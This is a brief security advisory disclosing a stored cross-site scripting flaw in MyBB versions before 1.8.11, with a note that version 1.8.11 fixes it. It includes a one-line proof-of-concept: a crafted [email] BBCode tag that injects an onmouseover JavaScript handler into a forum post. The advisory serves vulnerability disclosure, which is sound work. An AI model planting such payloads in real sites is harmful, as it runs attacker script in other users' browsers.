MyBB <1.8.11 Cross Site Scripting#################################
Description:
============
product:MyBB
Homepage:https://mybb.com/
vulnerable version:<1.8.11
Severity:High risk
===============
Proof of Concept:
=============
1.post a thread or reply any thread ,write:
[email=2"onmouseover="alert(document.location)]hover me[/email]
then when useras mouse hover it,XSS attack will occur!
============
Fixed:
============
This vulnerability was fixed in version 1.8.11
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
=============
Best regards,
Zhiyang Zeng of Tencent security platform department
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum